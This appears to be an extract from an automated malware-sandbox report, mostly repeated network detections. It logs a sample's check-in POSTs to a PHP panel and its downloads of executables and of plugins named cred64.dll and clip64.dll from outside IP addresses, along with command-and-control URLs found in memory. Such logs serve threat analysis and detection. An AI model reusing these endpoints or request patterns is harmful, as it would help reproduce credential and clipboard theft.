                          Source: global trafficHTTP traffic detected: POST /VzCAHn.php?A629855EB2A22925382193 HTTP/1.1Host: 185.81.68.147Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
                          Source: global trafficHTTP traffic detected: POST /VzCAHn.php?A629855EB2A22925382193 HTTP/1.1Host: 185.81.68.147Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
                          Source: global trafficHTTP traffic detected: POST /VzCAHn.php?A629855EB2A22925382193 HTTP/1.1Host: 185.81.68.147Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
                          Source: global trafficHTTP traffic detected: POST /VzCAHn.php?A629855EB2A22925382193 HTTP/1.1Host: 185.81.68.147Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
                          Source: global trafficHTTP traffic detected: POST /VzCAHn.php?A629855EB2A22925382193 HTTP/1.1Host: 185.81.68.147Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
                          Source: global trafficHTTP traffic detected: POST /VzCAHn.php?A629855EB2A22925382193 HTTP/1.1Host: 185.81.68.147Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
                          Source: global trafficHTTP traffic detected: POST /VzCAHn.php?A629855EB2A22925382193 HTTP/1.1Host: 185.81.68.147Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
                          Source: global trafficHTTP traffic detected: POST /VzCAHn.php?A629855EB2A22925382193 HTTP/1.1Host: 185.81.68.147Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
                          Source: global trafficHTTP traffic detected: POST /VzCAHn.php?A629855EB2A22925382193 HTTP/1.1Host: 185.81.68.147Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
                          Source: global trafficHTTP traffic detected: POST /VzCAHn.php?A629855EB2A22925382193 HTTP/1.1Host: 185.81.68.147Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
                          Source: global trafficHTTP traffic detected: POST /VzCAHn.php?A629855EB2A22925382193 HTTP/1.1Host: 185.81.68.147Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
                          Source: global trafficHTTP traffic detected: POST /VzCAHn.php?A629855EB2A22925382193 HTTP/1.1Host: 185.81.68.147Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
                          Source: global trafficHTTP traffic detected: POST /VzCAHn.php?A629855EB2A22925382193 HTTP/1.1Host: 185.81.68.147Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
                          Source: global trafficHTTP traffic detected: POST /VzCAHn.php?A629855EB2A22925382193 HTTP/1.1Host: 185.81.68.147Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
                          Source: global trafficHTTP traffic detected: POST /VzCAHn.php?A629855EB2A22925382193 HTTP/1.1Host: 185.81.68.147Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
                          Source: global trafficHTTP traffic detected: POST /VzCAHn.php?A629855EB2A22925382193 HTTP/1.1Host: 185.81.68.147Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
                          Source: global trafficHTTP traffic detected: POST /VzCAHn.php?A629855EB2A22925382193 HTTP/1.1Host: 185.81.68.147Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
                          Source: global trafficHTTP traffic detected: POST /VzCAHn.php?A629855EB2A22925382193 HTTP/1.1Host: 185.81.68.147Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
                          Source: global trafficHTTP traffic detected: POST /VzCAHn.php?A629855EB2A22925382193 HTTP/1.1Host: 185.81.68.147Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
                          Source: global trafficHTTP traffic detected: POST /VzCAHn.php?A629855EB2A22925382193 HTTP/1.1Host: 185.81.68.147Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
                          Source: global trafficHTTP traffic detected: POST /VzCAHn.php?A629855EB2A22925382193 HTTP/1.1Host: 185.81.68.147Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
                          Source: global trafficHTTP traffic detected: POST /VzCAHn.php?A629855EB2A22925382193 HTTP/1.1Host: 185.81.68.147Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
                          Source: global trafficHTTP traffic detected: POST /VzCAHn.php?A629855EB2A22925382193 HTTP/1.1Host: 185.81.68.147Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
                          Source: global trafficHTTP traffic detected: POST /VzCAHn.php?A629855EB2A22925382193 HTTP/1.1Host: 185.81.68.147Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
                          Source: global trafficHTTP traffic detected: POST /VzCAHn.php?A629855EB2A22925382193 HTTP/1.1Host: 185.81.68.147Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
                          Source: global trafficHTTP traffic detected: POST /VzCAHn.php?A629855EB2A22925382193 HTTP/1.1Host: 185.81.68.147Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
                          Source: global trafficHTTP traffic detected: POST /VzCAHn.php?A629855EB2A22925382193 HTTP/1.1Host: 185.81.68.147Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
                          Source: global trafficHTTP traffic detected: POST /VzCAHn.php?A629855EB2A22925382193 HTTP/1.1Host: 185.81.68.147Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
                          Source: global trafficHTTP traffic detected: POST /VzCAHn.php?A629855EB2A22925382193 HTTP/1.1Host: 185.81.68.147Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
                          Source: global trafficHTTP traffic detected: POST /VzCAHn.php?A629855EB2A22925382193 HTTP/1.1Host: 185.81.68.147Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
                          Source: global trafficHTTP traffic detected: POST /VzCAHn.php?A629855EB2A22925382193 HTTP/1.1Host: 185.81.68.147Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
                          Source: global trafficHTTP traffic detected: POST /VzCAHn.php?A629855EB2A22925382193 HTTP/1.1Host: 185.81.68.147Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
                          Source: global trafficHTTP traffic detected: POST /VzCAHn.php?A629855EB2A22925382193 HTTP/1.1Host: 185.81.68.147Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
                          Source: global trafficHTTP traffic detected: POST /VzCAHn.php?A629855EB2A22925382193 HTTP/1.1Host: 185.81.68.147Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.81.68.147
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.81.68.147
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.81.68.147
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.81.68.147
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.81.68.147
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.81.68.147
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.81.68.147
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.81.68.147
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.81.68.147
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.81.68.147
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.81.68.147
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.81.68.147
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.81.68.147
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.81.68.147
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.81.68.147
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.81.68.147
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.81.68.147
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.81.68.147
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.81.68.147
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.81.68.147
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.81.68.147
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.81.68.147
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.81.68.147
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.81.68.147
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.81.68.147
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.81.68.147
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.81.68.147
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.81.68.147
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.81.68.147
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.81.68.147
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.81.68.147
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.81.68.147
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.81.68.147
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.81.68.147
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.81.68.147
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.81.68.147
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.81.68.147
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.81.68.147
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.81.68.147
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.81.68.147
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.81.68.147
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.81.68.147
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.81.68.147
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.81.68.147
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.81.68.147
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.81.68.147
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.81.68.147
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.81.68.147
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.81.68.147
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.81.68.147
                          Source: C:\Users\user\Desktop\mggoBrtk9t.exeCode function: 0_2_00007FF7CDC41CDC InternetOpenW,Sleep,InternetOpenUrlW,InternetOpenUrlW,InternetCloseHandle,Sleep,HttpQueryInfoA,InternetCloseHandle,InternetCloseHandle,Sleep,InternetCloseHandle,InternetOpenUrlW,InternetCloseHandle,Sleep,HttpQueryInfoA,GetProcessHeap,RtlAllocateHeap,InternetCloseHandle,InternetCloseHandle,InternetReadFile,InternetCloseHandle,InternetCloseHandle,0_2_00007FF7CDC41CDC
                          Source: global trafficHTTP traffic detected: GET /ctx.exe HTTP/1.1Host: 185.81.68.147Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
                          Source: global trafficHTTP traffic detected: GET /ssg.exe HTTP/1.1Host: 185.81.68.147Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
                          Source: global trafficHTTP traffic detected: GET /update.exe HTTP/1.1Host: 185.81.68.147Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
                          Source: global trafficHTTP traffic detected: GET /gfx.exe HTTP/1.1Host: 185.81.68.147Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
                          Source: global trafficHTTP traffic detected: GET /7vhfjke3/Plugins/cred64.dll HTTP/1.1Host: 185.81.68.147
                          Source: global trafficHTTP traffic detected: GET /7vhfjke3/Plugins/clip64.dll HTTP/1.1Host: 185.81.68.147
                          Source: unknownHTTP traffic detected: POST /VzCAHn.php?A629855EB2A22925382193 HTTP/1.1Host: 185.81.68.147Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
                          Source: rundll32.exe, 00000021.00000002.3797376340.0000000002E85000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.8
                          Source: Gxtuum.exe, 00000017.00000002.3805886910.0000000000826000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.81.68.147/
                          Source: Gxtuum.exe, 00000017.00000002.3805886910.0000000000826000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.81.68.147/$
                          Source: Gxtuum.exe, 00000017.00000002.3805886910.0000000000826000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.81.68.147/46122658-3693405117-2476756634-1003
                          Source: Gxtuum.exe, 00000017.00000002.3805886910.0000000000848000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.81.68.147/7vhfjke3/Plugins/clip64.dll
                          Source: Gxtuum.exe, 00000017.00000002.3805886910.00000000007B7000.00000004.00000020.00020000.00000000.sdmp, Gxtuum.exe, 00000017.00000002.3805886910.00000000007FF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.81.68.147/7vhfjke3/Plugins/cred64.dll
                          Source: Gxtuum.exe, 00000017.00000002.3805886910.00000000007FF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.81.68.147/7vhfjke3/Plugins/cred64.dll$
                          Source: Gxtuum.exe, 00000017.00000002.3805886910.00000000007B7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.81.68.147/7vhfjke3/Plugins/cred64.dllamingZ
                          Source: rundll32.exe, 0000001A.00000002.3469272832.0000022206438000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000001C.00000002.3004550203.00000247D3402000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000001C.00000003.2990680017.00000247D3409000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000021.00000002.3797376340.0000000002E60000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000021.00000002.3797376340.0000000002E1A000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000022.00000002.3798980117.00000000031BA000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000022.00000002.3798980117.00000000031FF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.81.68.147/7vhfjke3/index.php
                          Source: Gxtuum.exe, 00000017.00000002.3805886910.00000000007FF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.81.68.147/7vhfjke3/index.php#
                          Source: Gxtuum.exe, 00000017.00000002.3805886910.0000000000848000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.81.68.147/7vhfjke3/index.php(q
                          Source: rundll32.exe, 00000022.00000002.3798980117.00000000031BA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.81.68.147/7vhfjke3/index.php6)
                          Source: Gxtuum.exe, 00000017.00000002.3805886910.0000000000848000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.81.68.147/7vhfjke3/index.php8q
                          Source: Gxtuum.exe, 00000017.00000002.3805886910.0000000000848000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.81.68.147/7vhfjke3/index.php8r
                          Source: Gxtuum.exe, 00000017.00000002.3805886910.0000000000848000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.81.68.147/7vhfjke3/index.phpEo8
                          Source: Gxtuum.exe, 00000017.00000002.3805886910.0000000000848000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.81.68.147/7vhfjke3/index.phpHo5
                          Source: Gxtuum.exe, 00000017.00000002.3805886910.0000000000848000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.81.68.147/7vhfjke3/index.phpHq
                          Source: Gxtuum.exe, 00000017.00000002.3805886910.0000000000848000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.81.68.147/7vhfjke3/index.phpHr
                          Source: Gxtuum.exe, 00000017.00000002.3805886910.00000000007FF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.81.68.147/7vhfjke3/index.phpI
                          Source: Gxtuum.exe, 00000017.00000002.3805886910.0000000000848000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.81.68.147/7vhfjke3/index.phpXq
                          Source: Gxtuum.exe, 00000017.00000002.3805886910.0000000000848000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.81.68.147/7vhfjke3/index.phpYbB
                          Source: Gxtuum.exe, 00000017.00000002.3805886910.0000000000848000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.81.68.147/7vhfjke3/index.phpb8b
                          Source: Gxtuum.exe, 00000017.00000002.3805886910.0000000000848000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.81.68.147/7vhfjke3/index.phpbf198
                          Source: Gxtuum.exe, 00000017.00000002.3805886910.0000000000848000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.81.68.147/7vhfjke3/index.phpbo
                          Source: Gxtuum.exe, 00000017.00000002.3805886910.0000000000848000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.81.68.147/7vhfjke3/index.phpi
                          Source: Gxtuum.exe, 00000017.00000002.3805886910.0000000000848000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.81.68.147/7vhfjke3/index.phpxq
                          Source: rundll32.exe, 00000021.00000002.3797376340.0000000002E60000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.81.68.147/7vhfjke3/index.php~
                          Source: Gxtuum.exe, 00000017.00000002.3805886910.0000000000826000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.81.68.147/wsys
                          Source: Gxtuum.exe, 00000017.00000002.3805886910.0000000000826000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.81.68.148/
                          Source: rundll32.exe, 00000022.00000002.3798980117.0000000003211000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.81.68.148/8Fvu5jh
                          Source: rundll32.exe, 00000021.00000002.3797376340.0000000002E73000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.81.68.148/8Fvu5jh4DbS$g
                          Source: rundll32.exe, 00000022.00000002.3798980117.00000000031BA000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000022.00000002.3798980117.0000000003211000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.81.68.148/8Fvu5jh4DbS/index.php
                          Source: Gxtuum.exe, 00000017.00000002.3805886910.0000000000835000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.81.68.148/8Fvu5jh4DbS/index.php(
                          Source: rundll32.exe, 0000001A.00000002.3469272832.00000222064D6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.81.68.148/8Fvu5jh4DbS/index.php1iP
                          Source: Gxtuum.exe, 00000017.00000002.3805886910.0000000000848000.00000004.00000020.00020000.00000000.sdmp, Gxtuum.exe, 00000017.00000002.3805886910.0000000000835000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.81.68.148/8Fvu5jh4DbS/index.php98
                          Source: Gxtuum.exe, 00000017.00000002.3805886910.00000000007FF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.81.68.148/8Fvu5jh4DbS/index.phpG
                          Source: rundll32.exe, 0000001A.00000002.3469272832.00000222064D6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.81.68.148/8Fvu5jh4DbS/index.phpJU:
                          Source: Gxtuum.exe, 00000017.00000002.3805886910.0000000000835000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.81.68.148/8Fvu5jh4DbS/index.phpK
                          Source: Gxtuum.exe, 00000017.00000002.3805886910.0000000000826000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.81.68.148/8Fvu5jh4DbS/index.phpM
                          Source: Gxtuum.exe, 00000017.00000002.3805886910.0000000000835000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.81.68.148/8Fvu5jh4DbS/index.phpP
                          Source: Gxtuum.exe, 00000017.00000002.3805886910.0000000000835000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.81.68.148/8Fvu5jh4DbS/index.phpV
                          Source: Gxtuum.exe, 00000017.00000002.3805886910.0000000000848000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.81.68.148/8Fvu5jh4DbS/index.phpb
                          Source: Gxtuum.exe, 00000017.00000002.3805886910.0000000000835000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.81.68.148/8Fvu5jh4DbS/index.phpbbf198
                          Source: Gxtuum.exe, 00000017.00000002.3805886910.0000000000826000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.81.68.148/8Fvu5jh4DbS/index.phpd
                          Source: Gxtuum.exe, 00000017.00000002.3805886910.00000000007E5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.81.68.148/8Fvu5jh4DbS/index.phpi
                          Source: Gxtuum.exe, 00000017.00000002.3805886910.0000000000848000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.81.68.148/8Fvu5jh4DbS/index.phplasses
                          Source: Gxtuum.exe, 00000017.00000002.3805886910.0000000000848000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.81.68.148/8Fvu5jh4DbS/index.phpmb3JtLXVybGVuY29kZWQ=ex.php$o
                          Source: Gxtuum.exe, 00000017.00000002.3805886910.0000000000835000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.81.68.148/8Fvu5jh4DbS/index.phpndows
                          Source: Gxtuum.exe, 00000017.00000002.3805886910.0000000000848000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.81.68.148/8Fvu5jh4DbS/index.phpodedY
                          Source: Gxtuum.exe, 00000017.00000002.3805886910.00000000007FF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.81.68.148/8Fvu5jh4DbS/index.phps
                          Source: rundll32.exe, 00000021.00000002.3797376340.0000000002E60000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.81.68.148/8Fvu5jh4DbS/index.phpsK1bRhSyTkkD9QYQDw4TYWGHLCsdncEYUAc
                          Source: Gxtuum.exe, 00000017.00000002.3805886910.0000000000848000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.81.68.148/8Fvu5jh4DbS/index.phpvhfjke3/index.php
                          Source: rundll32.exe, 00000021.00000002.3797376340.0000000002E1A000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000022.00000002.3798980117.00000000031BA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.81.68.148/Fvu5jh4DbS/index.php
                          Source: Gxtuum.exe, 00000017.00000002.3805886910.0000000000826000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.81.68.148/J
                          Source: Gxtuum.exe, 00000017.00000002.3805886910.0000000000826000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.81.68.148/ViewSizePreferences.SourceAumid
